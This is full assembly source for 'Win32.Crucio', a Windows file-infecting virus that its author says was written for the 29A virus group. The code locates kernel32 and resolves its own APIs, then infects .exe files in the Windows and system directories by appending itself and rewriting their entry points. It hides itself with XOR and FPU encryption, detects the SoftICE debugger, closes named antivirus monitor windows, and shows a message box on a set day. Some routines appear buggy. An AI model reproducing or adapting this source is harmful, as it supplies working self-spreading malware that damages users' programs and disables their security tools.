;                  ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
;                   ccc   rrrr     u      u      ccc   i    oo
;                  c      r   r    u      u     c      i   o  o
;                 c       r    r   u      u    c       i  o    o
;                c        r   r    u      u   c        i o      o
;                c        rrrr     u      u   c        i o      o 
;                 c       r   r    u      u    c       i  o    o
;                  c      r    r    u    u      c      i   o  o
;                   ccc   r     r     uu         ccc   i    oo
;                  ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²



;Win32.Crucio by powerdryv = Surya

;This was my very 1st of the viruses.Now, since I wanted to contribute
;to 29A,I value-added to this virus. The virus now is encrypted with a
;simple Sliding Key Alogo.,(XOR being the operation). For each dword
;being encrypted the Key increases by 4.After the XOR operation is per-
;formed the dword gets again encrypted thru FPU instuction.The algo.
;used for encryption is simple.In 1st step the dword get squared, then
;its added to itself and again it gets squared.So u see the simplicity.

;   Anti-Emulation : Yes, again using FPI
;   Anti-AV : Shuts down AV monitors
;   PayLoad : On every 25th of month shows a message box
;   Resident : No
;   Poly : No
;   Sets up SEH frams, (well that's a necessity)
                                                        

.586
.587
.model flat
jumps

extrn ExitProcess:proc
extrn MessageBoxA:proc

SizeOfVirus     equ     (offset EndOfVirus-StartOfVirus)/4
EncodedVirus    equ     (EEndOfVirus-EStartOfVirus)/4
SizeOne equ     (StartOfVirus-EStartOfVirus)/4

.data
szTitle   db      "Win32.Crucio by Surya",0

Message db      "In every color there's the light",13
        db      "In every stone sleeps a crystal",13
        db      "Remember the Shaman when he used to say:",13
        db      "Man is the dream of the dolphin.",0

SoftIce9x      db      "\\.\SICE",0
SoftIceNT      db      "\\.\NTSICE",0

.code
        StartOfVirus    label   byte

Start:	call Delta
Delta:	fnop
	pop ebp
	mov eax, offset Delta
        fild [ebp]
	fild [eax]
	fsub
	fabs
	fnop
	fistp dword ptr [Impy]
	mov ebp, Impy
	call CheckDebggers
	mov ecx, EncodedVirus
	lea edi, [ebp+EStartOfVirus]
	call Decoder
	jmp RealStart
Impy dd 0

RealStart:	
EStartOfVirus	label	byte
	
	mov esi, [esp]
	and esi, 0FFFF0000h
	mov ecx, 5

Check4MZ: 
	sub esi, 10000h
        	cmp word ptr [esi], "ZM"
	je Check4PE
        	loop Check4MZ
                	mov ecx, cs
                	xor cl, cl
                	jecxz WinNT
                	mov esi, 0BFF70000h
	jmp Check4PE
WinNT:
	mov esi, 077F00000h

Check4PE: cmp dword ptr [esi+80h], 'EP'
	jne Check4MZ
	mov dword ptr [ebp+@Kernel@], esi
	xchg eax, esi

        call SetSEH
	mov esp, [esp+8h]
	jmp ResSEH
SetSEH:
	push dword ptr fs:[0]
	mov fs:[0], esp


@1:	lea edi, [ebp+ApiOffsets]
        	lea esi, [ebp+ApiNames]
        	call GetApi
	call CloseAV

CheckDebggers2:
        	push 0
        	push 80h                 
        	push 3h            
        	push 0h
	push 1h
        	push 0C0000000h
        	push offset SoftIce9x
        	call [ebp+@CreateFileA@]
	inc eax
        	jnz Detected
        	dec eax

        	push 0
        	push 80h                 
        	push 3h            
        	push 0h
	push 1h
        	push 0C0000000h
        	push offset SoftIceNT
        	call [ebp+@CreateFileA@]
	inc eax
        	jnz Detected
        	dec eax

PayLoad:
	lea eax, [ebp+Samay]
	push eax
	call [ebp+@GetSystemTime@]
	cmp word ptr [ebp+S_wDay], 25h
	je Detected
	
	call MainInfection1
	call MainInfection2
ResSEH:
	pop dword ptr fs:[0]
	push 0
	call ExitProcess

MainInfection1:
	push 128
	lea eax, [ebp+offset windir]
	push eax
	mov eax, [ebp+offset @GetWindowsDirectoryA@]
	call eax

	push 128
	lea eax, [ebp+offset sysdir]
	push eax
	mov eax, [ebp+offset @GetSystemDirectoryA@]
	call eax

Return:	ret

MainInfection2:
@3:	lea eax, [ebp+windir]
	push eax
	call [ebp+@SetCurrentDirectoryA@]
	call FindThem
	jmp ResSEH
	
	lea eax, [ebp+sysdir]
	push eax
	call [ebp+@SetCurrentDirectoryA@]
	call FindThem
        jmp ResSEH

FindThem		proc
	lea eax, [ebp+Win32_Find_Data]
	push eax
	lea eax, [ebp+EXEtension]
	push eax
	call [ebp+@FindFirstFileA@]
	inc eax
	jz Failed2Find
	dec eax
	mov dword ptr [ebp+SearchHandle], eax

@@1:
	push dword ptr [ebp+OldEIP]
	push dword ptr [ebp+NewBase]
	call InfectThem
	pop dword ptr [ebp+NewBase]
	push dword ptr [ebp+OldEIP]
	
@@2:
	lea edi, [ebp+Win32_Find_Data]
	mov ecx, MAX_PATH
	xor al, al
	rep stosb

	lea eax, [ebp+Win32_Find_Data]
	push eax
	push dword ptr [ebp+EXEtension]
	call [ebp+@FindNextFileA@]
	test eax, eax
	jz Failed2Find
	jmp @@1
@@3:
	push dword ptr [ebp+SearchHandle]
	call [ebp+@FindClose@]

Failed2Find: ret
FindThem		endp

GetApi	proc

@_1:	push esi
	push edi
	call GetTheApis
	pop edi
	pop esi
	stosd
	xchg edi, esi
	xor al, al

@_2:	scasb
	jnz @_2
	xchg edi, esi

@_3:	cmp byte ptr [esi], 0BBh
	je Return2
	jmp @_1

Return2:	ret
GetApi	endp

GetTheApis      proc
	mov edx, esi
	mov edi, esi
	xor al, al
	
@@_1:	scasb
	jnz @@_1
	sub edi, esi
	mov ecx, edi

	xor eax, eax
	mov word ptr [ebp+Counter], ax
	mov esi, [ebp+@Kernel@]
	add esi, 3ch
	lodsw
        	add eax, [ebp+@Kernel@]
	mov esi, [eax+78h]
	add esi, 1ch
	add esi, [ebp+@Kernel@]
	lodsd
	add eax, [ebp+@Kernel@]
	mov dword ptr [ebp+@AddyTable@], eax
	lodsd
	add eax, [ebp+@Kernel@]
	push eax
	lodsd
	add eax, [ebp+@Kernel@]
        mov dword ptr [ebp+@OrdinalTable@], eax
	pop esi
	xor ebx,ebx

@@_2:	push esi
	lodsd
	add eax, [ebp+@Kernel@]
	mov esi, eax
	mov edi, edx
	push ecx
	cld
	rep cmpsb
	pop ecx
	jz @@_3
	pop esi
	add esi, 4
	inc ebx
	inc word ptr [ebp+Counter]
	jmp @@_2

@@_3:    	pop esi
	movzx eax, word ptr [ebp+Counter]
	shl eax, 1
	add eax, dword ptr [ebp+@OrdinalTable@]
	xor esi, esi
	xchg eax, esi
	lodsw
	shl eax, 2
	add eax, dword ptr [ebp+@AddyTable@]
	mov esi, eax
	lodsd
	add eax, [ebp+@Kernel@]
	ret
GetTheApis      endp

InfectThem	proc
        lea eax, [ebp+WFD_szFileName]
	push 80h
	push eax
	call [ebp+@SetFileAttributesA@]

	call OpenIt
	inc eax
	jz Failed2Open
	dec eax
	mov [ebp+FileHandle], eax	;dword ptr

	mov ecx, [ebp+WFD_nFileSizeLow]
        call CreateMapOfIt
	test eax, eax
	jz CantMap		;to Close the file
	mov [ebp+MapHandle], eax

	call MapIt
	test eax, eax
	jz UnmapIt
	mov [ebp+MapAddy], eax

	mov esi, [eax+3ch]
	add esi, eax
	cmp dword ptr [esi], 'EP'
	jne LeaveIt
	cmp dword ptr [esi+4ch], 'aea'	;Gaea
	jne LeaveIt

	push dword ptr [esi+3ch]
	push dword ptr [ebp+MapAddy]
	call [ebp+@CloseHandle@]
	pop ecx

        	mov eax, [ebp+WFD_nFileSizeLow]
	add eax, SizeOfVirus
        	call AlignIt
	xchg ecx, eax
	
	call CreateMapOfIt
	test eax, eax
	jz CantMap	;to Close the file
	
	mov [ebp+MapHandle], eax
	mov ecx, [ebp+NewSize]
	call MapIt
	test eax, eax
	jz UnmapIt
	mov [ebp+MapAddy], eax

	mov esi, [eax+3ch]
	add esi, eax
	mov [ebp+PEHeader], esi
	xor eax, eax	
	mov ax, word ptr [esi+6ch]	;
	dec eax
	imul eax, eax, 28h
	add esi, 78h
	add esi, eax
	mov ebx, [ebp+PEHeader+74h]
	shl ebx, 3
	add esi, ebx

	mov eax, [ebp+PEHeader+28h]
	mov [ebp+OldEIP], eax	;dword ptr
	mov eax, [ebp+PEHeader+34h]
	mov [ebp+NewBase], eax	;dword ptr

	mov ebx, [esi+10h]
	mov edx, ebx
	mov ebx, [esi+14h]
	push ebx
	mov edi, [ebp+PEHeader]

	mov eax, edx
	add eax, [esi+0ch]
	mov [edi+28h], eax
	mov dword ptr [ebp+NewEIP], eax
	
	mov eax, [esi+10h]
	add eax, SizeOfVirus
	mov ecx, [edi+3ch]
	call AlignIt
	
	mov [esi+10h], eax
	mov [esi+08h], eax
	pop ebx
	mov eax, [esi+10ch]
	add eax, [esi+0ch]
	mov [edi+50h], eax
	or dword ptr [esi+24h], 0A0000020h

	mov dword ptr [edi+4ch], 'aea'
	lea esi, [ebp+Start]
	mov edi, ebx
	add edi, dword ptr [ebp+MapAddy]
        mov ecx, SizeOne
	rep movsd

	mov ecx, EncodedVirus
	lea esi, [ebp+RealStart]
	call RandomNo
	mov [ebp+EncKey], eax
	finit

Loop1:	xor esi, [ebp+EncKey]
	add [ebp+EncKey], 4h

	fild dword ptr [esi]
	fild dword ptr [esi]
	fmul
	fadd st, st
	fistp dword ptr [ebx]
	fild dword ptr [ebx]
	fild dword ptr [ebx]
	fmul
	fistp dword ptr [esi]

	movsd
	add esi, 4h
	loop Loop1
	lea esi, [ebp+Decoder]
	mov ecx, (Ending-Decoder)/4

Loop3:
	movsd
	add esi, 4h
        loop Loop3
	jmp UnmapIt
	
LeaveIt:
	call TruncateIt
UnmapIt:
	push dword ptr [ebp+MapAddy]
	call [ebp+@UnmapViewOfFile@]

	push dword ptr [ebp+MapHandle]
	call [ebp+@CloseHandle@]
CantMap:
	push dword ptr [ebp+FileHandle]
	call [ebp+@CloseHandle@]
	jmp ResSEH

Detected:
        	push    0                      
                        push    offset szTitle     
        	push    offset Message
        	push    00h
        	call    MessageBoxA                     
	push 0
	call ExitProcess

Failed2Open:
	push dword ptr [ebp+WFD_dwFileAttributes]
        	lea eax, [ebp+WFD_szFileName] 
	push eax
	call [ebp+@SetFileAttributesA@]
	ret
InfectThem		endp

AlignIt   proc
	push ebx
	xor ebx, ebx
	push eax
	div ecx
	pop eax
	sub ecx, ebx
	add eax, ecx
	pop ebx
	ret
AlignIt   endp

CreateMapOfIt	proc
	push 0
	push ecx
	push 0
	push 4h
	push dword ptr [ebp+FileHandle]
	call [ebp+@CreateFileMappingA@]
	ret
CreateMapOfIt	endp

MapIt	proc
	push ecx
	push 0
	push 0
	push 2h
	push dword ptr [ebp+MapHandle]
	call [ebp+@MapViewOfFile@]
	ret
MapIt	endp

OpenIt	proc
	push 0
	push 0
	push 3h	
	push 0
	push 1h
	push 80000000h or 40000000h
	push eax
	call [ebp+@CreateFileA@]
	ret
OpenIt	endp

TruncateIt      proc
	push 0
	push 0
	push ecx
	push dword ptr [ebp+FileHandle]
	call [ebp+@SetFilePointer@]	
        	push dword ptr [ebp+FileHandle]
	call [ebp+@SetEndOfFile@]
	ret
TruncateIt      endp

RandomNo		proc	
        	db 0fh, 31h
	mov [ebp+Ran0], eax
	call [ebp+@GetTickCount@]
	mov [ebp+Ran1], eax
	call [ebp+@GetTickCount@]
	mov [ebp+Ran2], eax
	call [ebp+@GetTickCount@]
	mov [ebp+Ran3], eax
	add eax, [ebp+Ran1]
        	call ClDoer
	ror eax, cl
	add eax, [ebp+Ran0]
	shl eax, 7h
	call ClDoer
	rol eax, cl
	add eax, [ebp+Ran2]
	sub eax, [ebp+Ran3]
	call ClDoer
	ror eax, cl
        mov [ebp+EncKey], eax
        ret

ClDoer  proc near
        in al, 40h
        mov cl, al 
        ret
ClDoer  endp
RandomNo		endp

CloseAV		proc
        	lea eax, [ebp+AVList]
Loop2:
	call CloseAVs
	xor al, al
	scasb
	jnz $-1
        cmp byte ptr [edi], 0BBh
	jnz Loop2
	ret
CloseAV		endp

CloseAVs		proc
	push edi
	push 0
	call [ebp+@FindWindowA@]
	test eax, eax
	jz Return3

	push 0
	push 0
	push 12h
	push eax
	call [ebp+@PostMessageA@]
	xor cl, cl
	org $-1
Return3:
	ret
CloseAVs		endp

	db	"I inspire.....",0

ApiNames                 label   byte
@FindFirstFileA	db	"FindFirstFileA",0
@FindNextFileA	db	"FindNextFileA",0
@FindClose	db	"FindClose",0
@CreateFileA	db	"CreateFileA",0
@SetFilePointer	db	"SetFilePointer",0
@SetFileAttributesA	db	"SetFileAttributesA",0
@CloseHandle	db	"CloseHandle",0
@GetCurrentDirectoryA	db	"GetCurrentDirectoryA",0
@SetCurrentDirectoryA	db	"SetCurrentDirectoryA",0
@GetWindowsDirectoryA	db	"GetWindowsDirectoryA",0
@GetSystemDirectoryA	db	"GetSystemDirectoryA",0
@CreateFileMappingA		db	"CreateFileMappingA",0
@MapViewOfFile	db	"MapViewOfFile",0
@UnmapViewOfFile	db	"UnmapViewOfFile",0
@SetEndOfFile	db	"SetEndOfFile",0
@GetTickCount	db	"GetTickCount",0
@GetSystemTime	db	"GetSystemTime",0
@FindWindowA	db	"FindWindowA",0
@PostMessageA	db	"PostMessageA",0
                        db      0BBh

AVList	label	byte
	db      "AVP Monitor",0
	db      "Amon Antivirus Monitor",0
	db      "McAfee Scan",0	
	db      0BBh


EXEtension              db      '*.exe',0
@Kernel@        dd      00000000h
EncKey          dd      00000000h

@Start@		dd	00000000h
@AddyTable@	dd	00000000h	
@OrdinalTable@	dd	00000000h
FileHandle		dd	00000000h
SearchHandle	dd	00000000h
MapHandle	dd	00000000h
MapAddy		dd	00000000h
PEHeader		dd	00000000h
NewEIP		dd	00000000h
NewSize         dd      00000000h
Counter         dw      0000h

ApiOffsets		label   byte
@FindFirstFileA@	dd	0
@FindNextFileA@	dd	0
@FindClose@             dd              0
@CreateFileA@          dd              0
@SetFilePointer@	dd              0
@SetFileAttributesA@		dd	0
@CloseHandle@	dd	0
@GetCurrentDirectoryA@	dd	0
@SetCurrentDirectoryA@	dd	0
@GetWindowsDirectoryA@	dd	0
@GetSystemDirectoryA@	dd	0
@CreateFileMappingA@	dd	0
@MapViewOfFile@		dd	0
@UnmapViewOfFile@	dd      	0
@SetEndOfFile@ 	dd	0
@GetTickCount@	dd	0
@GetSystemTime@	dd	0
@FindWindowA@	dd	0
@PostMessageA@	dd	0

Ran1    dd      0
Ran2    dd      0
Ran0    dd      0
Ran3    dd      0

MAX_PATH                equ     260

FILETIME                STRUC
FT_dwLowDateTime        dd      ?
FT_dwHighDateTime       dd      ?
FILETIME                ENDS

Win32_Find_Data         label   byte
WFD_dwFileAttributes    dd      ?
WFD_ftCreationTime      FILETIME ?
WFD_ftLastAccessTime    FILETIME ?
WFD_ftLastWriteTime     FILETIME ?
WFD_nFileSizeHigh       dd      ?
WFD_nFileSizeLow        dd      ?
WFD_dwReserved0         dd      ?
WFD_dwReserved1         dd      ?
WFD_szFileName          db      MAX_PATH dup (?)
WFD_szAlternateFileName db      13 dup (?)
                        db      03 dup (?)

Samay              label   byte
S_wYear		dw	?
S_wMonth		dw	?
S_wDayOfWeek	dw	?
S_wDay		dw	?
S_wHour		dw	?
S_wMinute		dw	?
S_wSecond	dw	?
S_wMilliseconds	dw	?


sysdir	db	128h dup(0)
windir	db	128h dup(0)
curdir	db	128h dup(0)

OldEIP	dd	0
NewBase	dd	0

	EEndOfVirus	label	byte

Decoder	proc	
	test ebp, ebp
	jz EndDecod
	mov eax, dword [ebp+EncKey]
	mov ebx, 2h
	finit
Looploopy:
	mov edx, dword ptr [edi]

	fild dword ptr [edx]
	fsqrt
	fistp dword ptr [Var1]
	fild dword ptr [ebx]
	fild dword ptr [Var1]
	fdiv
	fsqrt
	
	xor edx, eax
	add eax, 4h
	mov dword ptr [edi], edx
	add edi, 4
	loop Looploopy
EndDecod: ret

CheckDebggers:
	mov ecx, fs:[20h]
	jecxz EndDecod
	mov dword ptr [ebp+EncKey], -1
	ret
Decoder endp

Var1 dd 0

        EndOfVirus      label   byte

Ending:	end Start

;			I inspire....